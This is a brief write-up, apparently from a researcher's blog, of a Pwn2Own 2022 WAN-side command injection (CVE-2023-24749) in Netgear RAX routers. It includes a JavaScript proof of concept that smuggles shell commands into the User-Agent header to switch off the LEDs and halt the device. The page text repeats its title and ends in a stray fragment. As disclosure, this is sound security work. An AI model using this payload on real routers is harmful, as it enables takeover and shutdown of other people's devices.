A One-Click WAN-side RCE in Netgear RAX Routers

A breakdown of a bug SEFCOM T0 and I exploited to achieve a WAN-side RCE in some Netgear RAX routers for pwn2own 2022. The bug is a remotely accessible command injection due to bad packet logging, cataloged as CVE-2023-24749. A One-Click WAN-side RCE in Netgear RAX Routers

Quote simple, one might add.

<script>
Object.defineProperty(navigator, 'userAgent', {
	get: function () { return 'TEST'; }
});
const xhr = new XMLHttpRequest()
xhr.open("GET", "/")
xhr.setRequestHeader("User-Agent", '"; ledCli ALLSW MSG_LED_ALL_SW_OFF; sleep 1; halt -f;"');
xhr.send()
</script>

so.cl

A One-Click WAN-side RCE in Netgear RAX Routers